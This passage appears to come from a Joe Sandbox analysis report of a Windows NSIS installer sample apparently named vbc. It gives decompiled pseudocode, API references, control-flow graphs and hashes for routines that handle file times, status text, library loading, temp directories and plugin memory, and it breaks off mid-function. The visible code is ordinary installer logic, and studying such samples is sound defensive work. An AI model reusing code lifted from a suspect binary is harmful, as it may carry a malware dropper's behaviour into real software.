                                                							if(_t64 == 1) {
                                                								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                								L32:
                                                								_t51 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(_t81);
                                                								_push(0xfffffffa);
                                                								E0040559F();
                                                								L29:
                                                								_t51 = 0x7fffffff;
                                                							}
                                                						}
                                                					}
                                                					L33:
                                                					return _t51;
                                                				}
                                                				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                                				 *0x434fb4 =  *0x434fb4 + 1;
                                                				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                				 *0x434fb4 =  *0x434fb4 - 1;
                                                				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                				_t84 = _t45;
                                                				if( *(_t86 - 0x24) != 0xffffffff) {
                                                					L22:
                                                					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                				} else {
                                                					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                						goto L22;
                                                					}
                                                				}
                                                				CloseHandle( *(_t86 - 0x38)); // executed
                                                				__eflags = _t84 - _t77;
                                                				if(_t84 >= _t77) {
                                                					goto L31;
                                                				} else {
                                                					__eflags = _t84 - 0xfffffffe;
                                                					if(_t84 != 0xfffffffe) {
                                                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                					} else {
                                                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                						lstrcatW(_t81,  *(_t86 - 8));
                                                					}
                                                					_push(0x200010);
                                                					_push(_t81);
                                                					E00405B9D();
                                                					goto L29;
                                                				}
                                                				goto L33;
                                                			}


















                                                0x0040176f
                                                0x00401776
                                                0x00401782
                                                0x00401785
                                                0x0040178a
                                                0x0040178d
                                                0x00401794
                                                0x004017b0
                                                0x00401796
                                                0x00401797
                                                0x00401797
                                                0x004017b6
                                                0x004017bb
                                                0x004017bb
                                                0x004017bf
                                                0x004017c2
                                                0x004017c7
                                                0x004017c9
                                                0x004017cb
                                                0x004017d0
                                                0x004017d0
                                                0x004017db
                                                0x004017db
                                                0x004017ec
                                                0x004017ee
                                                0x004017ee
                                                0x004017ef
                                                0x004017ef
                                                0x004017f2
                                                0x004017f5
                                                0x004017f8
                                                0x004017f8
                                                0x004017ff
                                                0x0040180e
                                                0x00401813
                                                0x00401816
                                                0x00401819
                                                0x00000000
                                                0x00000000
                                                0x0040181b
                                                0x0040181e
                                                0x00401874
                                                0x00401879
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c2d
                                                0x00000000
                                                0x00401820
                                                0x00401826
                                                0x0040182d
                                                0x0040183a
                                                0x00401845
                                                0x0040185b
                                                0x0040185b
                                                0x0040185e
                                                0x00000000
                                                0x00401864
                                                0x00401864
                                                0x00401865
                                                0x00401882
                                                0x00402c33
                                                0x00402c33
                                                0x00402c33
                                                0x00401867
                                                0x00401867
                                                0x00401868
                                                0x00401493
                                                0x0040239d
                                                0x0040239d
                                                0x0040239d
                                                0x00401865
                                                0x0040185e
                                                0x00402c35
                                                0x00402c39
                                                0x00402c39
                                                0x00401892
                                                0x00401897
                                                0x004018a5
                                                0x004018aa
                                                0x004018b0
                                                0x004018b4
                                                0x004018b6
                                                0x004018be
                                                0x004018ca
                                                0x004018b8
                                                0x004018b8
                                                0x004018bc
                                                0x00000000
                                                0x00000000
                                                0x004018bc
                                                0x004018d3
                                                0x004018d9
                                                0x004018db
                                                0x00000000
                                                0x004018e1
                                                0x004018e1
                                                0x004018e4
                                                0x004018fc
                                                0x004018e6
                                                0x004018e9
                                                0x004018f2
                                                0x004018f2
                                                0x00401901
                                                0x00401906
                                                0x00402398
                                                0x00000000
                                                0x00402398
                                                0x00000000

                                                APIs
                                                • lstrcatW.KERNEL32 ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp$C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll$Call
                                                • API String ID: 1941528284-110629784
                                                • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 856 40559f-4055b4 857 4055ba-4055cb 856->857 858 40566b-40566f 856->858 859 4055d6-4055e2 lstrlenW 857->859 860 4055cd-4055d1 call 40657a 857->860 862 4055e4-4055f4 lstrlenW 859->862 863 4055ff-405603 859->863 860->859 862->858 864 4055f6-4055fa lstrcatW 862->864 865 405612-405616 863->865 866 405605-40560c SetWindowTextW 863->866 864->863 867 405618-40565a SendMessageW * 3 865->867 868 40565c-40565e 865->868 866->865 867->868 868->858 869 405660-405663 868->869 869->858
                                                C-Code - Quality: 100%
                                                			E0040559F(signed int _a4, WCHAR* _a8) {
                                                				struct HWND__* _v8;
                                                				signed int _v12;
                                                				WCHAR* _v32;
                                                				long _v44;
                                                				int _v48;
                                                				void* _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				WCHAR* _t27;
                                                				signed int _t28;
                                                				long _t29;
                                                				signed int _t37;
                                                				signed int _t38;
                                                
                                                				_t27 =  *0x433ee4;
                                                				_v8 = _t27;
                                                				if(_t27 != 0) {
                                                					_t37 =  *0x434fb4;
                                                					_v12 = _t37;
                                                					_t38 = _t37 & 0x00000001;
                                                					if(_t38 == 0) {
                                                						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                					}
                                                					_t27 = lstrlenW(0x42c248);
                                                					_a4 = _t27;
                                                					if(_a8 == 0) {
                                                						L6:
                                                						if((_v12 & 0x00000004) == 0) {
                                                							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                						}
                                                						if((_v12 & 0x00000002) == 0) {
                                                							_v32 = 0x42c248;
                                                							_v52 = 1;
                                                							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                							_v44 = 0;
                                                							_v48 = _t29 - _t38;
                                                							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                						}
                                                						if(_t38 != 0) {
                                                							_t28 = _a4;
                                                							0x42c248[_t28] = 0;
                                                							return _t28;
                                                						}
                                                					} else {
                                                						_t27 = lstrlenW(_a8) + _a4;
                                                						if(_t27 < 0x1000) {
                                                							_t27 = lstrcatW(0x42c248, _a8);
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t27;
                                                			}

















                                                0x004055a5
                                                0x004055af
                                                0x004055b4
                                                0x004055ba
                                                0x004055c5
                                                0x004055c8
                                                0x004055cb
                                                0x004055d1
                                                0x004055d1
                                                0x004055d7
                                                0x004055df
                                                0x004055e2
                                                0x004055ff
                                                0x00405603
                                                0x0040560c
                                                0x0040560c
                                                0x00405616
                                                0x0040561f
                                                0x0040562b
                                                0x00405632
                                                0x00405636
                                                0x00405639
                                                0x0040564c
                                                0x0040565a
                                                0x0040565a
                                                0x0040565e
                                                0x00405660
                                                0x00405663
                                                0x00000000
                                                0x00405663
                                                0x004055e4
                                                0x004055ec
                                                0x004055f4
                                                0x004055fa
                                                0x00000000
                                                0x004055fa
                                                0x004055f4
                                                0x004055e2
                                                0x0040566f

                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                • lstrcatW.KERNEL32 ref: 004055FA
                                                • SetWindowTextW.USER32 ref: 0040560C
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll,00000000), ref: 00406779
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll
                                                • API String ID: 1495540970-1345219435
                                                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 870 40689a-4068ba GetSystemDirectoryW 871 4068bc 870->871 872 4068be-4068c0 870->872 871->872 873 4068d1-4068d3 872->873 874 4068c2-4068cb 872->874 876 4068d4-406907 wsprintfW LoadLibraryExW 873->876 874->873 875 4068cd-4068cf 874->875 875->876
                                                C-Code - Quality: 100%
                                                			E0040689A(intOrPtr _a4) {
                                                				short _v576;
                                                				signed int _t13;
                                                				struct HINSTANCE__* _t17;
                                                				signed int _t19;
                                                				void* _t24;
                                                
                                                				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                				if(_t13 > 0x104) {
                                                					_t13 = 0;
                                                				}
                                                				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                					_t19 = 1;
                                                				} else {
                                                					_t19 = 0;
                                                				}
                                                				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                				return _t17;
                                                			}








                                                0x004068b1
                                                0x004068ba
                                                0x004068bc
                                                0x004068bc
                                                0x004068c0
                                                0x004068d3
                                                0x004068cd
                                                0x004068cd
                                                0x004068cd
                                                0x004068ec
                                                0x00406900
                                                0x00406907

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                • wsprintfW.USER32 ref: 004068EC
                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 877 405a6e-405ab9 CreateDirectoryW 878 405abb-405abd 877->878 879 405abf-405acc GetLastError 877->879 880 405ae6-405ae8 878->880 879->880 881 405ace-405ae2 SetFileSecurityW 879->881 881->878 882 405ae4 GetLastError 881->882 882->880
                                                C-Code - Quality: 100%
                                                			E00405A6E(WCHAR* _a4) {
                                                				struct _SECURITY_ATTRIBUTES _v16;
                                                				struct _SECURITY_DESCRIPTOR _v36;
                                                				int _t22;
                                                				long _t23;
                                                
                                                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                				_v36.Owner = 0x4083f8;
                                                				_v36.Group = 0x4083f8;
                                                				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                				_v16.lpSecurityDescriptor =  &_v36;
                                                				_v36.Revision = 1;
                                                				_v36.Control = 4;
                                                				_v36.Dacl = 0x4083e8;
                                                				_v16.nLength = 0xc;
                                                				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                				if(_t22 != 0) {
                                                					L1:
                                                					return 0;
                                                				}
                                                				_t23 = GetLastError();
                                                				if(_t23 == 0xb7) {
                                                					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                						goto L1;
                                                					}
                                                					return GetLastError();
                                                				}
                                                				return _t23;
                                                			}







                                                0x00405a79
                                                0x00405a7d
                                                0x00405a80
                                                0x00405a86
                                                0x00405a8a
                                                0x00405a8e
                                                0x00405a96
                                                0x00405a9d
                                                0x00405aa3
                                                0x00405aaa
                                                0x00405ab1
                                                0x00405ab9
                                                0x00405abb
                                                0x00000000
                                                0x00405abb
                                                0x00405ac5
                                                0x00405acc
                                                0x00405ae2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405ae4
                                                0x00405ae8

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                • GetLastError.KERNEL32 ref: 00405AC5
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                • GetLastError.KERNEL32 ref: 00405AE4
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3449924974-4017390910
                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 883 73281817-73281856 call 73281bff 887 7328185c-73281860 883->887 888 73281976-73281978 883->888 889 73281869-73281876 call 73282480 887->889 890 73281862-73281868 call 7328243e 887->890 895 73281878-7328187d 889->895 896 732818a6-732818ad 889->896 890->889 899 73281898-7328189b 895->899 900 7328187f-73281880 895->900 897 732818cd-732818d1 896->897 898 732818af-732818cb call 73282655 call 73281654 call 73281312 GlobalFree 896->898 904 7328191e-73281924 call 73282655 897->904 905 732818d3-7328191c call 73281666 call 73282655 897->905 920 73281925-73281929 898->920 899->896 906 7328189d-7328189e call 73282e23 899->906 902 73281888-73281889 call 73282b98 900->902 903 73281882-73281883 900->903 916 7328188e 902->916 908 73281890-73281896 call 73282810 903->908 909 73281885-73281886 903->909 904->920 905->920 919 732818a3 906->919 924 732818a5 908->924 909->896 909->902 916->919 919->924 925 7328192b-73281939 call 73282618 920->925 926 73281966-7328196d 920->926 924->896 933 7328193b-7328193e 925->933 934 73281951-73281958 925->934 926->888 931 7328196f-73281970 GlobalFree 926->931 931->888 933->934 935 73281940-73281948 933->935 934->926 936 7328195a-73281965 call 732815dd 934->936 935->934 937 7328194a-7328194b FreeLibrary 935->937 936->926 937->934
                                                C-Code - Quality: 88%
                                                			E73281817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				void _v36;
                                                				char _v136;
                                                				struct HINSTANCE__* _t37;
                                                				intOrPtr _t42;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t50;
                                                				void* _t54;
                                                				intOrPtr _t57;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t72;
                                                				void* _t76;
                                                
                                                				_t76 = __esi;
                                                				_t68 = __edi;
                                                				_t67 = __edx;
                                                				 *0x7328506c = _a8;
                                                				 *0x73285070 = _a16;
                                                				 *0x73285074 = _a12;
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x73285048, E73281651);
                                                				_push(1); // executed
                                                				_t37 = E73281BFF(); // executed
                                                				_t54 = _t37;
                                                				if(_t54 == 0) {
                                                					L28:
                                                					return _t37;
                                                				} else {
                                                					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                						E7328243E(_t54);
                                                					}
                                                					_push(_t54);
                                                					E73282480(_t67);
                                                					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                					if(_t57 == 0xffffffff) {
                                                						L14:
                                                						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                								_push(_t54);
                                                								_t37 = E73282655();
                                                							} else {
                                                								_push(_t76);
                                                								_push(_t68);
                                                								_t61 = 8;
                                                								_t13 = _t54 + 0x1018; // 0x1018
                                                								memcpy( &_v36, _t13, _t61 << 2);
                                                								_t42 = E73281666(_t54,  &_v136);
                                                								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                								_t18 = _t54 + 0x1018; // 0x1018
                                                								_t72 = _t18;
                                                								_push(_t54);
                                                								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                								 *_t72 = 4;
                                                								E73282655();
                                                								_t63 = 8;
                                                								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                							}
                                                						} else {
                                                							_push(_t54);
                                                							E73282655();
                                                							_t37 = GlobalFree(E73281312(E73281654(_t54)));
                                                						}
                                                						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                							_t37 = E73282618(_t54);
                                                							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                								_t37 =  *(_t54 + 0x1008);
                                                								if(_t37 != 0) {
                                                									_t37 = FreeLibrary(_t37);
                                                								}
                                                							}
                                                							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                								_t37 = E732815DD( *0x73285068);
                                                							}
                                                						}
                                                						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                							goto L28;
                                                						} else {
                                                							return GlobalFree(_t54);
                                                						}
                                                					}
                                                					_t48 =  *_t54;
                                                					if(_t48 == 0) {
                                                						if(_t57 != 1) {
                                                							goto L14;
                                                						}
                                                						E73282E23(_t54);
                                                						L12:
                                                						_t54 = _t48;
                                                						L13:
                                                						goto L14;
                                                					}
                                                					_t49 = _t48 - 1;
                                                					if(_t49 == 0) {
                                                						L8:
                                                						_t48 = E73282B98(_t57, _t54); // executed
                                                						goto L12;
                                                					}
                                                					_t50 = _t49 - 1;
                                                					if(_t50 == 0) {
                                                						E73282810(_t54);
                                                						goto L13;
                                                					}
                                                					if(_t50 != 1) {
                                                						goto L14;
                                                					}
                                                					goto L8;
                                                				}
                                                			}


















                                                0x73281817
                                                0x73281817
                                                0x73281817
                                                0x73281824
                                                0x7328182c
                                                0x73281839
                                                0x73281847
                                                0x7328184a
                                                0x7328184c
                                                0x73281851
                                                0x73281856
                                                0x73281978
                                                0x73281978
                                                0x7328185c
                                                0x73281860
                                                0x73281863
                                                0x73281868
                                                0x73281869
                                                0x7328186a
                                                0x73281870
                                                0x73281876
                                                0x732818a6
                                                0x732818ad
                                                0x732818d1
                                                0x7328191e
                                                0x7328191f
                                                0x732818d3
                                                0x732818d3
                                                0x732818d4
                                                0x732818dd
                                                0x732818de
                                                0x732818e8
                                                0x732818eb
                                                0x732818f0
                                                0x732818f7
                                                0x732818f7
                                                0x732818fd
                                                0x732818fe
                                                0x73281904
                                                0x7328190a
                                                0x73281917
                                                0x73281918
                                                0x7328191b
                                                0x732818af
                                                0x732818af
                                                0x732818b0
                                                0x732818c5
                                                0x732818c5
                                                0x73281929
                                                0x7328192c
                                                0x73281939
                                                0x73281940
                                                0x73281948
                                                0x7328194b
                                                0x7328194b
                                                0x73281948
                                                0x73281958
                                                0x73281960
                                                0x73281965
                                                0x73281958
                                                0x7328196d
                                                0x00000000
                                                0x7328196f
                                                0x00000000
                                                0x73281970
                                                0x7328196d
                                                0x7328187a
                                                0x7328187d
                                                0x7328189b
                                                0x00000000
                                                0x00000000
                                                0x7328189e
                                                0x732818a3
                                                0x732818a3
                                                0x732818a5
                                                0x00000000
                                                0x732818a5
                                                0x7328187f
                                                0x73281880
                                                0x73281888
                                                0x73281889
                                                0x00000000
                                                0x73281889
                                                0x73281882
                                                0x73281883
                                                0x73281891
                                                0x00000000
                                                0x73281891
                                                0x73281886
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281886

                                                APIs
                                                  • Part of subcall function 73281BFF: GlobalFree.KERNEL32(?), ref: 73281E74
                                                  • Part of subcall function 73281BFF: GlobalFree.KERNEL32(?), ref: 73281E79
                                                  • Part of subcall function 73281BFF: GlobalFree.KERNEL32(?), ref: 73281E7E
                                                • GlobalFree.KERNEL32(00000000), ref: 732818C5
                                                • FreeLibrary.KERNEL32(?), ref: 7328194B
                                                • GlobalFree.KERNEL32(00000000), ref: 73281970
                                                  • Part of subcall function 7328243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7328246F
                                                  • Part of subcall function 73282810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73281896,00000000), ref: 732828E0
                                                  • Part of subcall function 73281666: wsprintfW.USER32 ref: 73281694
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688751399.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000003.00000002.688743070.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688756158.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688761184.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                • String ID:
                                                • API String ID: 3962662361-3916222277
                                                • Opcode ID: 4606671b8831c3c661b6cbebacc9347888ea1b417c3e1c4865585c7f69f65894
                                                • Instruction ID: 50984e9d651121102e6edebaceb5b54fa93795519466b6b085e403dc143bfc0e
                                                • Opcode Fuzzy Hash: 4606671b8831c3c661b6cbebacc9347888ea1b417c3e1c4865585c7f69f65894
                                                • Instruction Fuzzy Hash: A941B6726003569BEB119F74E988BD537ACBF04314F188865E94B9E0C6DBB8E0C5C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 940 40605c-406068 941 406069-40609d GetTickCount GetTempFileNameW 940->941 942 4060ac-4060ae 941->942 943 40609f-4060a1 941->943 945 4060a6-4060a9 942->945 943->941 944 4060a3 943->944 944->945
                                                C-Code - Quality: 100%
                                                			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                				intOrPtr _v8;
                                                				short _v12;
                                                				short _t12;
                                                				intOrPtr _t13;
                                                				signed int _t14;
                                                				WCHAR* _t17;
                                                				signed int _t19;
                                                				signed short _t23;
                                                				WCHAR* _t26;
                                                
                                                				_t26 = _a4;
                                                				_t23 = 0x64;
                                                				while(1) {
                                                					_t12 =  *L"nsa"; // 0x73006e
                                                					_t23 = _t23 - 1;
                                                					_v12 = _t12;
                                                					_t13 =  *0x40a57c; // 0x61
                                                					_v8 = _t13;
                                                					_t14 = GetTickCount();
